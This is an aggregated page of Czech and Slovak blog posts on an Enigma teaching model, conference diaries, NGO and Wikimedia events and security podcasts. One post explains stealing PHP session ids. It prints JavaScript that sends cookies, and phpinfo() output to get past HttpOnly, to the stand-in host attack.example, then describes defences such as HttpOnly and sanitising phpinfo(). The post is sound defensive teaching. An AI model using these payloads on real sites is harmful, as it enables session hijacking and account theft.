Planeta OpenAlt

Vzdělávejte se v Akademii Stronger Roots! Získejte přístup k webinářům zdarma

21.
června
Nadace OSF

Víte, jak získat více příznivců? Chcete zaujmout dárce, oslovit dobrovolníky a posílit fundraising a komunikaci? Právě teď můžete získat přístup k záznamům z webinářů Akademie Stronger Roots s těmi nejpovolanějšími expertkami a experty. Neváhejte –⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠ čas máte jen do konce července!

(více…)

Zjednodušený funkční model Enigma

Na kroužku programování se věnujeme i aktivitám bez počítače. Patří mezi ně i kryptografie a Caesarova šifra. Její princip i vysvětlení jsou snadné. Názorně na ní lze ukázat i prolomení šifer. Zde je hlavní problém konkrétně v tom, že se stejné písmeno šifruje vždy stejně, tudíž je dnes triviální ji prolomit frekvenční analýzou či hrubou silou. Co dalšího tedy představit zvídavým žákům, aby to bylo zajímavé jak po technické stránce, tak se silným příběhem? Jednoznačně Enigma. Ale jak jim to předat?

Úvod

Příběh přístroje Enigma je velmi působivý. Z populárně naučných zdrojů můžu doporučit zejména Knihu kódů a šifer (Simon Singh) nebo film Kód Enigmy.

To bychom měli příběh. Ale jak zjednodušeně představit technickou stránku? Dlouho jsem to v hlavě nosil jen jako nápad, až jsem jednou na internetu zakopl o papírovou Enigmu. Hned jsem zatoužil použít ji v hodině. Funkčně provedení odpovídá skutečnosti, ale vzhledově je zároveň stále daleko. Nemám ambice shánět věrný model, ale nešlo by to přeci jen o něco lépe?

3D Model

Kromě jiných hraček do kroužku programování jsem si pořídil i 3D tiskárnu. Vítám tedy každé praktické využití, kterým si člověk nákup ospravedlní. Takže jsem strávil nějaký čas hledáním modelů Enigmy a nakonec našel 3D model zdarma i stránku s podrobnějším vysvětlením.

Hlásím, že tisk funguje. Dokonce jsem to zvládl i na Průša MINI. Jen bylo potřeba hlavní osu ve sliceru rozříznout a po vytištění slepit. Povšimněte si, že pro přesnější spasování dílů jsem si tam připravil konektory.

Plastové díly polepíte papírovými součástmi, které jsem v rámci prodloužení trvanlivosti přelepil ještě průhlednou lepenkou. Výsledek pak vypadá následovně. Znalci si povšimnou, že kromě rotorů je možné (nikoliv nutné) pracovat i s nastavením kroužků (dokonce umí i plugboard, ale stejně mi pro názornost nepřišel tak zásadní).

Jak to funguje

Jak Enigma pracuje a jak byla prolomená je jednak mimo rozsah tohoto příspěvku, jednak o tom bylo již spoustu napsáno.

Jako úvod do problematiky doporučuji názorné video How did the Enigma Machine work?.

Práce s modelem je velmi pracná a zdlouhavá. Doporučuji si každý krok poznačovat na papír, včetně nastavení rotorů, kdybyste si je omylem rozházeli. Každopádně pro rychlé ověřování a další pokusy jsem velmi ocenil online simulátor.

Závěr

3D model Enigmy je funkční. Vysvětlení není snadné, ale přijde mi, že je pro žáky stravitelné. (De)šifrování je pracné, zdlouhavé a náchylné na lidskou chybu. Manuálně otáčíte rotory, což by ve skutečnosti měla na starosti ozubená kola. (Včetně sledování, zda nedošlo k přenosu na další rotor; je možné a do začátku vhodné zvolit příklady, kde to není potřeba.) Prstem nebo očima sledujete vodiče, to by jinak okamžitě zařídil elektrický proud v obvodu. Přesto všechno jsem rád, že jsem zařadil do svého repertoáru.

Související

Interview ve Studiu ČT24 k zákonu o kybernetické bezpečnosti

18.
června
Jan Kopriva

Dnes jsem byl pozván do vysílání dopoledního Studia ČT 24, kde jsem měl možnost krátce pohovořit o aktuálně připravované novelizaci zákona o kybernetické bezpečnosti a o kritických hlasech, které ze strany řady organizací v souvislosti s její tvorbou zaznívají na adresu NÚKIB. Záznam z vysílání Studia ČT24 najdete v případě zájmu na tomto odkazu - část věnovaná výše zmíněnému tématu začíná začíná přibližně v čase 1:14:20…

Studio ČT24

Čo máj 2024 dal a vzal

16.
června
Fero Volár
Čo máj 2024 dal a vzal

Máj bol opäť jedna veľká jazda od prvého do posledného dňa, ako som už avizoval počas apríla. Začínal výborne, lebo som bol ešte na Hytte. Ale aj ďalšie dni stáli za to, prebehnite si ich so mnou.

Čo máj 2024 dal a vzal
  • 🇪🇸 Barcelona je láska. Štyri intenzívne dni debát o marketingu, hudbe, salesu, ale aj politike, starnutí a živote. Quality time s Rišom, z ktorého zápisky by vydali na jednu knihu.
  • 🕶️ Z geekovských vychytávok som v Barcelone kúpil Ray-Ban Meta. Dosť sa s nimi teraz hrám, skúšam točiť daily videá. Ale veľmi sa mi nechce do strihu.
  • 📈 Workshop "Data Driven Sales" od Martina Bednáře v Prahe bol to pre mňa niečo, ako stretnutie s obľúbenou celebritou. Nové pohľady na sales a chce byť krok pred konkurenciou - určite odporúčam.
Čo máj 2024 dal a vzal
  • 🤝 Ďalší deň skvelá networkovacia akcia Feels like Deals v Prahe. Martine, vďaka za pozvanie.
  • 📽️ Keďže som sa veľa presúval a väčšinu času trávil prácou, tak som potreboval občas aj vypnúť hlavu. Tak som sa konečne dostal k dokumentu Sly. A zážitok bol aj zájsť si do Lucerny na Tady Havel, slyšíte mě? Predsa len v tom priestore to malo inú energiu a aj emócie.
  • ➡️ Ani Košice nemohli chýbať.
  • 🚲 Stihol som po Záhorí aj prevetrať bike.
Čo máj 2024 dal a vzal
  • 🇩🇪 No a tretí deň som si z Prahy odskočil na AWS Cloud Summit do Berlína. Výlet na otočku, veľmi intenzívne. Verím, že dám čoskoro von video.
Čo máj 2024 dal a vzal
  • 📖 Z kníh som si dal repete Umění války od Sun-C’. Mal som takú potrebu pozrieť na stratégiu s odstupom.
  • ☁️ V Labyrinth Labs sme organizovali druhý meetup AWS User Group Bratislava zameraný na cost optimalizáciu. Celkom sa to pretiahlo, debaty boli skvelé.

Bola to jazda a viac dní som bol mimo ako doma.

Jún bude v podobnom duchu, čítame sa opäť o mesiac.

Pozvánka na TNW Conference 2024

14.
června
Fero Volár
Pozvánka na TNW Conference 2024

Veľa vody pretieklo Amstelom, keď som bol naposledy na The Next Web Conference. Písali sa roky 2012 a 2013. Medzičasom prebieha podujatie pod Financial Times. Ale poďme k veci.

TNW Conference sa uskutoční 20. a 21. júna v Amsterdame – ide o podujatie pre všetkých, ktorí majú radi technológie a inovácie. Čakajú vás dva dni plné prednášok, praktických workshopov a networkingových stretnutí.

TNW Conference je pre vás ideálne podujatie, ak sa zameriavate ale pôsobíte ako

  • Startup
  • Investor
  • Korporácia

Ja som sa z tohto podujatia pravidelne vracal nabitý energiou. Skvelé prednášky, workshopy a networking.

Lístky na TNW Conference sa rýchlo míňajú.

Slasti a strasti IT náboru

Jiří Kostov – Moravio
11. 6. 2024 – úterý

Z projekťáka personalistou, z českého prostředí do mezinárodního, inhouse vs remote. Co vše obnáší dělat HR pro malou českou softwarovou agenturu s mezinárodním přesahem?

SecurityCast Ep#230 - o hrátkách Microsoftu s naším soukromím nebo bezpečnosti biometriky

06.
června
Jan Kopriva

Tak jako každý měsíc, i v červnu je tu i nová epizoda pravidelného speciálu podcastu ALEF SecurityCast. Najdete ji na YouTube a na Spotify a podíváme se v ní na potenciálně nebezpečnou funkci Recall, kterou společnost Microsoft plánuje implementovat do operačního systému Windows 11, krádež desítek milionů záznamů o zákaznících společnosti Dell, zero-day zranitelnosti v prohlížeči Chrome i řadu dalších témat…

Pozor na přehřívání Heltec Lora32 v3! Může za to jeden rezistor. Návod, jak to upravit na...

04.
června
chiptron.cz

- Návody a rady / Tutorials

Posledních několik týdnů "jedeme" hojně decentralizovanou a samoorganizující se síť Meshtastic. Nakupují se vývojové kity, vyrábí se nové nody. Mezi populárními deskami, které lze pro Meshtastic použít, je Heltec Lora 32 V3 s OLED displejem. Bohužel, tento modul má jednu chybu, která způsobuje přehřátí obvodu pro nabíjení baterie.

Nemomobile from March to May 2024

01.
června
Jozef Mlich
News has been ongoing since February, with progress made in several areas. Porting to OpenSuSE continues, issues in Manjaro-based images are being addressed, the maliit keyboard has been improved, and the Bluetooth dialogs in Lipstick are being reworked.

S komunitou v zádech: Tržiště inspirace, inovací a know-how

30.
května
Nadace OSF

Ve dvou se to lépe táhne –⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠ ale co takhle v deseti či ve dvaceti? Den S komunitou v zádech, který se uskutečnil ve čtvrtek 23. května 2024 v Komunitním prostoru Smíchov, přilákal na sedm desítek účastnic a účastníků ze všech koutů Česka. V unikátním multifunkčním prostoru původního evangelického kostela se po celý den střídaly workshopy a diskusní panely s předními osobnostmi z byznysu i organizací občanské společnosti, které zúčastněné provedly zákulisím budování komunit a předaly jim řadu praktických rad a tipů.

(více…)

#30 – Stanou se nanoboti zkázou rakoviny?

„Pomocí magnetické rezonance můžeme sledovat, kde přesně se nachází nanočástice a zda dorazila do cíle – nádoru. Pokud ne, tak můžeme přidat chemoterapii v podobě nanočástic, a tak šít pacientovi terapii v takzvaně real time manners. Výhoda je v tom, že pacienta nepředávkujeme, zabráníme množství vedlejších účinků a umíme to sledovat v reálném čase.“

Příčinou úmrtí více než čtvrtiny Čechů je rakovina. Diagnóza, kterou si nechce vyslechnout nikdo z nás, je velkým strašákem i kvůli samotné léčbě. Radikální řešení zahrnuje operace, ozařování a chemoterapii, nevítanou součástí jsou bohužel vedlejší účinky. Padáním vlasů počínaje, řídnutím kostí konče. Vědci z celého světa se shodují, že chemoterapie je proti rakovině velmi účinná a hledají proto způsoby, jak omezit její negativní dopady na člověka. Jednou z metod je používání takzvaných nanobotů. Nepředstavujte si miniaturní roboty putující v krvi, ale spíše speciální buňky, ideálně ještě sledovatelné moderními přístroji. Právě na takových nanobotech pracuje doktorandka Michaela Vojníková z CEITEC VUT, která se chystá díky Fulbrightovu stipendiu do Ameriky. Ve volném čase se navíc věnuje popularizaci vědy na sociálních sítích a v podcastu, protože věří, že věda nepatří pouze do laboratoře a vědeckých publikací.

WhatsApp u dětí, rodičů v práci i ve škole

V digitálním věku se komunikace mezi dětmi, učiteli a rodiči stále více přesouvá do on-line prostředí. Jednou z nejčastěji používaných platforem je WhatsApp, který nabízí jednoduchý a rychlý způsob, jak sdílet informace a komunikovat v reálném čase. Avšak tato forma komunikace přináší …

Příspěvek WhatsApp u dětí, rodičů v práci i ve škole pochází z Spajk.cz

Romská autorka Eva Danišová vydává knihu, která inspiruje k učení nejen romské děti

21.
května
Nadace OSF

Ne všechny děti vyrůstají v takových podmínkách, aby jednou mohly naplnit svůj potenciál. Život v sociálně vyloučených lokalitách i mimo ně profesní dráhu těch romských předurčuje již v raném věku k nezdaru i kvůli tomu, že už na samém prahu vzdělávání musí zdolat řadu bariér. Nakladatelství Kher s podporou Nadace OSF i 150 dárců, jejichž dary zdvojnásobila Nadace Albatros, vydalo edukativní knihu Jekh, duj, trin! Jak jedna malá žabka dohopkala do školy. Jejím záměrem je vzbudit v dětech zvídavost, přiblížit jim, co je nejen ve škole čeká, a pomoci jim s přípravou do ní, aby zde mohly být úspěšné stejně jako jiné děti.

(více…)

Čo apríl 2024 dal a vzal

21.
května
Fero Volár
Čo apríl 2024 dal a vzal

Prvý apríl, ak sa naň pozriem cez čísla čítanosti a zdieľania tohto článku mi vyšiel výborne. Pozrime sa ale aj na ďalšie dni.

  • 🥱 Apríl sa u mňa niesol v podobe jarnej únavy a nejakej vnútornej nespokojnosti. Asi tie voľby.
Čo apríl 2024 dal a vzal
  • 🎟️ Pomohla mi na to permanentka do Botanickej záhrady.
  • 📷 Podarilo sa mi fixnúť problém s foťákom. Už som si naň celkom rýchle zvykol.
  • 😎 Dá sa už nič nerobiť na deke v parku, alebo pri Dunaji. Na takéto počasie som sa tešil.
  • 🤖 V Labyrinth Labs sme zorganizovali v Spote spolu s AWS poldňovú konferenciu zameranú na GenAI.
Čo apríl 2024 dal a vzal
  • 📖 Z kníh ma najviac zaujala Budoucnost (ne)práce od Filipa Dřímalku a Toto je marketing od Setha Godina.
  • 🛖 Vrcholom mesiaca a jeho super zakončením bola Hytta. Ja som ju spomínal len nedávno na vlogu a teraz som sa do nej takmer po roku vrátil. S partnerkou a na dlhšie. Je to láska.
Čo apríl 2024 dal a vzal
  • Už teraz vám viem sľúbiť, že máj bude našlapaný.

Ve vědění je síla, vzkazuje Wikimedia Česká republika. Výzva Lidská práva na Wikipedii právě začíná

20.
května
Wikimedia ČR

Spolek Wikimedia Česká republika, který pečuje o rozvoj české Wikipedie, věnuje konec května a celý červen na Wikipedii lidským právům. Pod záštitou zmocněnkyně vlády pro lidská práva Kláry Šimáčkové Laurenčíkové chce motivovat dobrovolné wikipedisty a wikipedistky i veřejnost, aby psali články o širokých lidskoprávních a humanistických tématech, historii i osobnostech. Hlavní editaton výzvy se koná 26. 6. v Praze ve spolupráci s Amnesty International.

Projekt Lidská práva na Wikipedii spojuje vytváření nových hesel pro Wikipedii s podporou lidských práv. Výzva začíná 20. 5. a běží až do konce června. Lze se jí zúčastnit online nebo osobně během tzv. editatonů, kde mohou nováčkům poradit zkušení lektoři a lektorky. Hlavní editaton proběhne ve spolupráci s Amnesty International 26. 6. v Praze v Langhans – v kavárně a centru Člověka v tísni od 15:00. Pro neziskové organizace připravuje Wikimedia ČR 5. 6. od 15:00 online workshop Jak dostat vaše téma na Wikipedii?.

Wikipedie i další wiki projekty usilují podle organizátorů výzvy o to, aby měl každý člověk opravdovou možnost se svobodně podílet na souhrnu všech znalostí. Stojí na možnosti „svobodně vyhledávat, přijímat a předávat informace“. Všeobecná deklarace lidských práv tuto možnost výslovně ukotvuje v 19. článku jako lidské právo.  

Výzva Lidská práva na Wikipedii již třetí rok ukazuje, že Wikimedia ČR se nechce o toto právo pouze opírat, ale také ho aktivně umožňovat. Chceme lidem nejen zprostředkovat přístup k neutrálním a aktuálním informacím o lidských právech, ale také ukázat jejich rozmanitost. Encyklopedická hesla na Wikipedii mohou postihnout silné příběhy obyčejných lidí bojující za lepší svět, stejně jako komplexnost nových lidskoprávních výzev v digitálním věku. Pojďme společně zajistit přístup k informacím o širokých lidskoprávních a humanistických tématech, historii a osobnostech. Ve vědění je síla!“ říká výkonná ředitelka Wikimedia Česká republika.

Editující se tak mohou pustit např. do rozšíření hesla o slavné Erin Brockovich nebo vytvořit zcela chybějící články, jako jsou Digitální práva nebo Právo na přístup k internetu, které mají mnoho jazykových mutací, ale na české Wikipedii zatím chybí. Psát je možné o čemkoliv, co s lidskými právy souvisí. Například o aktivistech za lidská práva, historii nebo třeba filmech, které se problematiky týkají.

Záštitu nad akcí převzala zmocněnkyně vlády pro lidská práva Klára Šimáčková Laurenčíková.

Součástí výzvy je také soutěž o poukázky do e-shopu Albatrosmedia.cz pro 10 nejlepších, které opět do soutěže věnovala Nadace Albatros. Ta navíc letos ocení každého účastníka a účastnici bez ohledu na umístění. Všichni zúčastnění tak získají 25% slevu na nákup v e-shopu a dopravu zdarma. 

Pro účast v soutěži stačí do shrnutí editace článku vložit hashtag #lidskaprava.

Kontakt:Hynek Kaplan
PR specialista a fundraiser
hynek.kaplan@wikimedia.cz

The post Ve vědění je síla, vzkazuje Wikimedia Česká republika. Výzva Lidská práva na Wikipedii právě začíná first appeared on Wikimedia ČR - blog.

Robotický den 2024

20.
května
RoboDoupě

Již 19. ročník soutěže Robotický den proběhne 9. června v Kongresovém centru v Praze. Je přihlášeno 128 robotů z 8 zemí (ČR, SK, PL, UA, DE, ES, PT a CY). Spolu s nimi by mělo dorazit 228 soutěžících rozdělených do 52 týmů. Soutěžícím bude 8 až 75 let. Víc asi netřeba dodávat (případně se [...]

Měsíc žen na Wikipedii ji obohatil o 382 nových a celkem 565 editovaných článků

15.
května
Wikimedia ČR

Březen a první týden v dubnu patřil na Wikipedii opět ženám a tématům s ženami spojenými. Díky výzvě Měsíc žen na Wikipedii, který již po sedmé pořádal spolek Wikimedia Česká republika, se podařilo 91 wikipedistům a wikipedistkám vytvořit 382 článků a dalších 183 rozšířit – celkem udělali 565 editací.

Letos jsme se společně sešli čtyřikrát: v Americkém centru, na Akademii věd, na Fakultě sociálních věd UK a ve Státním oblastním archivu v Praze. Spolupráce s různými partnery dlouhodobě pomáhá zasáhnout rozmanitou výseč témat a žen, resp. jejich biografií, které je potřeba pro Wikipedii zpracovat. Ať už jde o témata týkající se např. vědních disciplín či kulturních oblastí. Díky tomu se výzvě daří přilákat k editování nováčky s expertním vhledem. 

Cílem výzvy je jednak motivovat více žen k editování Wikipedie a jednak zvětšit objem biografií a souvisejících článků, které o ženách a s nimi spojených tématech pojednávají. V současnosti se na české Wikipedii nachází 120 tisíc biografií mužů a jen 26 tisíc biografií žen. Nepoměr je také v rozložení editorů. Pouze 1 z 10 dobrovolných editujících je žena. Do psaní článků se mohl v rámci výzvy zapojit kdokoliv – buď online z pohodlí svého domova, nebo přijít na některou z našich akcí, kde byli nejen úplným nováčkům k ruce naši zkušení lektoři a lektorky. 

Editování společně s velvyslancem

Hlavní akcí Měsíce žen na Wikipedii je již tradičně editaton v Americkém centru v Praze. Ve čtvrtek 21. března přišlo editovat 37 lidí a 5 se jich připojilo online.

„Editaton se zde konal již posedmé, velice si ceníme naší dlouhodobé spolupráce. Je to skvělá možnost jak sdílet společný zájem, slyšet příběhy jednotlivých článků a být svědkem cesty, kterou k jejich vytvoření musejí editoři a editorky ujít,“ říká Klára Joklová, výkonná ředitelka spolku Wikimedia Česká republika.

Na světě je spousta zajímavých žen, ať už v politice, v umění, ve vědě. Je škoda, že o nich víme tak málo a že na Wikipedii nemají zastoupení, které by si zasloužily.

– Kristina Němcová, účastnice editatonu

Vzácným hostem byl velvyslanec Spojených států amerických Bijan Sabet. Vyzkoušel si, jak se do Wikipedie přispívá a utvrdil naše dobré vztahy s americkou ambasádou, která spolek Wikimedia Česká republika dlouhodobě podporuje.

„Píšu článek o české sochařce Dagmar Šubrtové. Měla už asi 20 samostatných a nespočetně kolektivních výstav, takže ta tvorba hesla není příliš jednoduchá,“ komentuje Jiřina Kádnerová. Její článek vychází čistě z vlastních rešerší, za informacemi pro článek cestovala i do různých knihoven a galerií. Referencí – odkazů na literaturu nebo relevantní weby – je v článku na 125. 

Na tvorbu článku si našel čas i hlavní lektor spolku Wikimedia ČR, Pavel Bednařík: „Rozhodl jsem se přispět článkem o německé herečce Sandře Hüller, která hrála v oscarovém filmu Zóna zájmu a myslím si, že zrovna ona si zaslouží být na české Wikipedii.“

Ženy, média a Wikipedie: Téma pro studenty FSV UK

Autor: Jan Beránek, CC BY-SA 4.0, via Wikimedia Commons

Workshop Ženy, média a Wikipedie byl prvním, který jsme organizovali ve spolupráci se spolkem Studenti IKSŽ na Fakultě sociálních věd Univerzity Karlovy. Financování zajistil grant od Akademického senátu FSV UK. 

Pozvání do diskuse přijala zahraniční reportérka České televize Ilona Zasidkovyčová, doprovodila ji editorka Pavlína Tomášová. Přednáška se věnovala zejména působení Ilony na Ukrajině, při diskusi byl dán prostor tématům souvisejícím např. s genderovými předsudky. Díky workshopu vznikl také článek právě o Iloně Zasidkovyčové nebo byla nahrána fotka Markéty Fialové.

„Workshop Ženy, média a Wikipedie patřil mezi nejzajímavější edukační akce spolku Studenti IKSŽ. Podobné praktické kurzy s přesahem do jiného druhu mediální komunikace, než je zpravodajství, popřípadě PR, jsou na našem institutu bohužel nedostatkovým zbožím, a tak se stávají velmi žádanými ze strany studentů. Budeme velice rádi, pokud se spolkem Wikimedia ČR budeme moci spolupracovat i nadále!

– Michael Benda, místopředseda spolku Studenti IKSŽ

Ženy ve vědě – zvuky klávesnic se opět rozezněly Akademií věd

Již podruhé jsme spojili síly s Fyzikálním ústavem Akademie věd a hned z kraje editační výzvy jsme se potkali v krásných prostorách hlavní budovy Akademie věd na Národní třídě – tématem tohoto editatonu byly, stejně jako minulý rok, Ženy ve vědě. Samotné editování doprovodila putovní výstava České vědkyně a jejich přínosy nejen české vědě

Kromě Fyzikálního ústavu se letos zapojil také Historický ústav a wiki-rezidenti z několika partnerských institucí, muzeí a knihoven. Účastníci tvořili pestrý mix vědeckých pracovníků, wikipedistů a seniorů. Čas na editování si našel i předseda spolku WMČR Michal Reiter a spolu s ním několik dalších členů. 

Atmosféru akce můžete načerpat třeba skrze fotografie Richarda Sekeráka.

Ženy a archivy

Součástí Měsíce žen na Wikipedii byla v letošním roce také akce nazvaná Ženy a archivy, kterou jsme připravili jako součást GLAM spolupráce se Státním oblastním archivem v Praze (SOA). Seminář a workshop zaměřený na významné ženy a jejich odkaz byl určen středočeským archivářům a archivářkám, kteří si vyzkoušeli psaní a zdrojování původních článků. Mj. vznikly  nové příspěvky, jako např. článek o významné řeholnici Antoinettě Olze Chotkové.

Jak dopadla soutěž o ceny?

Všechny účastníky a účastnice výzvy jsme ocenili virtuální „medailí“ (uživatelským vyznamenáním vytvořeným právě pro tuto událost). Navíc pro prvních 100 účastnic a účastníků výzvy Měsíc žen na Wikipedii poskytl partner soutěže Audioteka měsíční vstup do svého Audiotéka klubu, což znamená přes 1 500 titulů k poslechu bezplatně v rámci předplatného a 20 % slevu na tisíce dalších audioknih.

Mezi 10 vítězů a vítězek jsme rozdělili poukázky od nakladatelství wo-menroční předplatné časopisu Heroine a další ceny. Kdo mezi ně patří? Podívejte se do tabulky níže.

NejaktivnějšíKarelkam83 příspěvků
Svajcr54 příspěvků
Dobroš36 příspěvků
Cena porotyNaďačelkvalitní texty o součaných vědkyních
Miroslava Fišerovákvalitní texty o současných světových umělkyních
JanaJinMarie Krakešová, Štěpánka Jislová
HalfirienEmma Stebbins, Adelaide Johnson
Jrnka kaDagrmar Šubrtová
RomanvysanskyMatky z Náměstí nebeského klidu
MAKY.ORELPříkrm

O vyhodnocení soutěže se postarali:

Projekt finančně podpořilo Velvyslanectví USA v České republice v rámci programu Small Grants. 

Děkujeme našim partnerům i všem, kdo se do letošní výzvy zapojili. Vítězům gratulujeme. Těšíme se opět za rok!

Pokračujeme nejen v březnu

V průběhu celého roku je aktivní skupina Ženy na Wikipedii na Facebooku. Budeme moc rádi, pokud se do ní přidáte a budete zde sdílet zkušenosti, navzájem si radit s editováním, sdílet články o významných ženách nebo tipy na články chybějící. Zajímá nás, co editorky a editoři na Wikipedii zažívají a jak toto prostředí dál kultivovat. Zapojte se také! Pojďme vytvořit skupinu lidí, která ženy na Wikipedii vítá.

Podívejte se za námi do Amerického centra

Jak probíhal editaton v Americkém centru? Podívejte se na video níže, ze kterého načerpáte atmosféru místa.

The post Měsíc žen na Wikipedii ji obohatil o 382 nových a celkem 565 editovaných článků first appeared on Wikimedia ČR - blog.

Kradení session id pomocí phpinfo() a jak tomu zabránit

15.
května
Michal Špaček

Aktualizace článku

  • 15.5. Doplnil jsem odstavec Co nedělat

Klasické přihlášení do webové aplikace vypadá tak, že zadáte jméno a heslo, formulář odešlete, aplikace přihlašovací údaje ověří a do tzv. sessiony uloží informaci, že jste přihlášeni. Do prohlížeče pak odešle cookie s identifikátorem session (session id), který označuje tu vaši „plechovku“ se session daty. Váš session id nikdo jiný úmyslně nedostane, pokud by ho totiž získal, byl by pak přihlášen do vašeho účtu, což by bylo značně nežádoucí.

Session hijacking

Ale to by tu nesměli být různí mizerové: ti se od vás snaží ideálně nějak nepozorovaně získat právě ten session identifikátor, tím se dostat do vaší sessiony a v podstatě se za vás vydávat, sessionu vám tzv. unést (anglicky se tomu říká „session hijacking“). Takový klasický způsob ukradení session id je pomocí útoku Cross-Site Scripting (XSS), kdy do stránky útočník nějak vloží JavaScript, ať už přímo, nebo vložením externího souboru, který zákeřný kód bude obsahovat. Ten vložený kód může vypadat např. takto:

new Image().src = 'https://attack.example/?cookie=' + encodeURIComponent(document.cookie);

Když pak návštěvník na stránku přijde, jeho prohlížeč uvidí JavaScript, vytvoří objekt typu Image a bude chtít načíst obrázek z uvedené adresy. Ta v parametru cookie obsahuje pro přenos v URL bezpečně zakódované všechny cookie, ke kterým má JavaScript aktuálně přístup, tedy ty, které jsou uložené pro aktuální stránku (dle nastavení atributu Domain, Path atd.) a nemají nastaven příznak HttpOnly.

Útočník si pak na svém serveru attack.example může zobrazit i třeba jenom access log, ve kterém uvidí požadavek na např. /?cookie=PHPSESSID%3D68516bed29d47527b8b23bd7dec20f19, z něj si pak vyzobne session id, v browseru načte stránku, ze které session id ukradl, otevře developer tools a přidá nebo změní cookie PHPSESSID, stránku pak reloadne a rázem je v té samé sessioně, česky sezení, přihlášen jako uživatel chudáka oběti.

Atribut HttpOnly

Pokud cookie má atribut HttpOnly, tak k ní JavaScript nemá přístup a kódem uvedeným výše ukrást nepůjde. To si ostatně můžete vyzkoušet v podstatě na jakémkoliv webu: ve vašem prohlížeči v developer tools si v záložce Application (Chrome) nebo Storage (Firefox) najděte nějakou cookie, která má příznak HttpOnly, a v konzoli, kterou můžete rovnou zobrazit stiskem klávesy Escape, si příkazem document.cookie vypište všechny cookies tak, jak je vidí JavaScript – cookies s HttpOnly tam nebudou.

Cookie s atributem HttpOnly není v document.cookie vidět

A cookie se session id, v PHP aplikacích obvykle pojmenovaná PHPSESSID, atribut HttpOnly má často nastaven. V defaultní konfiguraci PHP se ale nenastavuje a je potřeba to udělat dodatečně ručně např. pomocí

ini_set('session.cookie_httponly', true);

Obcházení HttpOnly pomocí phpinfo()

Takže smůla, ledaže… ledaže by na webu někde byl zobrazen výstup z phpinfo(), PHP funkce, která vypisuje úplně všechno o aktuálně použitém PHP. Klasicky bývá na /info.php nebo /phpinfo.php, občas třeba v administraci za přihlášením, což je ta lepší a doporučovaná varianta, ale sama o sobě zde popisovaný problém nevyřeší. phpinfo() jsem zmiňoval i v článku o Full Path Disclosure, protože kromě konfigurace PHP a informacích o rozšířeních zobrazí právě i cestu k souborům, která se útočníkům může k něčemu hodit.

phpinfo()

Klasický výstup z phpinfo()

Ve výstupu z phpinfo() ale jsou vypsané i hodnoty cookies, které browser při požadavku poslal, včetně těch s HttpOnly, protože takové cookies se normálně po síti přenáší a server je tedy v rámci požadavku obdrží. Ve výpisu tedy bude i hodnota session id, minimálně jako řádek s např. $_COOKIE['PHPSESSID'], ale dle verze PHP a konfigurace klidně i víckrát.

Session identifikátor v phpinfo() v poli $_REQUEST, $_COOKIE i $_SERVER

Toho může útočník využít: místo aby kradl session id JavaScriptem přímo z browseru pomocí document.cookie, tak si JavaScriptem pošle požadavek na např. /phpinfo.php, vytáhne si jen tu pro něj zajímavou část odpovědi, kterou pak připojí k následujícímu požadavku, který si pošle k sobě. To zařídí třeba následující kód, který někam do stránek na doméně https://app.example/ vloží místo výše uvedeného new Image().src …:

fetch('https://app.example/info.php')
  .then(response => response.text())
  .then(text => {
    cookie = text.match(/_COOKIE.{1,2000}/)[0];
    fetch('https://attack.example/?cookie=' + encodeURIComponent(cookie));
  });

Na prvním řádku pošleme požadavek na /info.php, druhý a třetí řádek zajistí, že v proměnné text budeme mít výstup z phpinfo(), ze kterého si na čtvrtém řádku vytáhneme řetězec _COOKIE a dalších maximálně 2000 znaků, ve kterých zcela určitě, kromě nějakého toho HTML, bude i session id. Na pátém řádku pak tento podřetězec přidáme do požadavku odesílaného na attack.example. Odpověď už nás nezajímá, stačí že prohlížeč poslal požadavek, a na serveru se pak podíváme do access logu. Mohli bychom si klidně poslat celé phpinfo(), ale potřeba to není, jdeme jenom po cookie se session id.

Pokud budete mít v aplikaci nějaký Cross-Site Scripting, aby útočník mohl vložit svůj zákeřný JavaScript, a výstup z phpinfo(), jedno jestli veřejně nebo za přihlášením, tak mizera může ukrást session id i když cookie, ve které se přenáší, má atribut HttpOnly.

Co s tím?

  1. Nemějte na webu XSS
  2. Nemějte v aplikaci výstup z phpinfo(), nebo věci jako var_dump($_SERVER) apod., a už vůbec ne veřejně

Teorie i praxe říká, že je lepší počítat s tím, že tam nějaký ten Cross-Site Scripting někdy mít budete, takže bod č. 1 padá. No a výstup z phpinfo() je celkem užitečná věc, takže bod č. 2 je také často nereálný.

Až když jsem psal bug report s titulkem „System Information contains sensitive information like the session id cookie“, tak mě napadl kompromis: phpinfo() v administraci necháme, ale ty důležitý údaje skryjeme, na ty tam stejně nikdo nekouká. Další úrovní zabezpečení by mohlo být zadání hesla nebo třeba 2FA kódu před naprosto každým zobrazením výstupu z phpinfo().

spaze/phpinfo

Už dříve jsem si vytvořil jednoduchý balíček spaze/phpinfo, který vezme výstup z phpinfo(), odřízne HTML hlavičku aby se ten výstup dal vložit do nějakého vlastního designu administrace apod. a inline CSS style="…" nahradí za class="…". Do této třídy jsem přidal sanitizaci, která defaultně nahrazuje hodnotu session id za hvězdičky.

Použití je skoro tak jednoduché jako zavolání phpinfo():

$info = new \Spaze\PhpInfo\PhpInfo();
echo $info->getHtml();

Jádrem toho celýho zázraku je v podstatě tenhle kód:

ob_start();
phpinfo();
$info = ob_get_clean();
echo str_replace(session_id(), '*****', $info);

Můžete si ale přidat vlastní nahrazování dalších hodnot jako jsou např. cookie pro permanentní přihlašování a další, můžete si zvolit i vlastní „hvězdičky“:

// $loginToken = getLoginTokenValue(); např.
$info = new \Spaze\PhpInfo\PhpInfo();
$info->addSanitization($loginToken, 'hele, asi spíš ne');
echo $info->getHtml();

Také bych doporučil výslovně uvést session id a nespoléhat se jen na samo-se-to, například pomocí něčeho jako:

$info = new \Spaze\PhpInfo\PhpInfo();
$info->addSanitization($this->sessionHandler->getId(), '[nope]');
echo $info->getHtml();

Na mém webu to všechno zajišťuje třída SanitizedPhpInfo (pokrytá testem), výsledek pak vypadá nějak takhle:

phpinfo() s maskovanými hodnotami v $_COOKIE[‚PHPSESSID‘] a $_SERVER[‚HTTP_COOKIE‘]

Setec Astronomy je přesmyčka „too many secrets“

Místo prostého volání phpinfo() tedy raději použijte spaze/phpinfo. Funkci phpinfo() jsem přidal i do spaze/phpstan-disallowed-calls, což je rozšíření pro PHPStan, které hledá nebezpečné funkce a další ve vašem kódu.

Co nedělat

